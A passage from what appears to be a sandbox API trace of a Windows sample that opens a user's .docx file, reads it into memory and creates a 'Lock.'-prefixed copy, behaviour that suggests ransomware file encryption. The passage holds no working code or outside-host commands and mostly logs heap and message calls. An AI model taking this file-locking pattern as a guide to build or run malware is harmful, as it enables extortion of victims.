wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.756] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/faIAqUgP BwWKbX.docx" (normalized: "c:\\users\\fd1hvy\\documents\\faiaqugp bwwkbx.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0215.757] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.757] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0215.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0215.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38544e8 [0215.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.758] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38544e8 | out: hHeap=0x2af0000) returned 1 [0215.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0215.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0215.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0215.759] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.faIAqUgP BwWKbX.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.faiaqugp bwwkbx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0215.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0215.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0215.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0215.761] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0215.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0215.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54ed020 [0215.764] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.764] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x96f7, lpOverlapped=0x0) returned 1 [0215.767] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x96f7) returned 0x2a8a138 [0215.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54ed020 | out: hHeap=0x2af0000) returned 1 [0215.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x96f7) returned 0x2a93838 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0215.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x96f7) returned 0x2a8a138 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0215.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0215.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0215.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0215.773] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0215.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0215.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x96f7) returned 0x2a8a138 [0215.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0215.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0215.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x96f7) returned 0x2aae878 [0215.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0215.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0215.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.776] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0215.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0215.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0215.777] HeapFree (in: 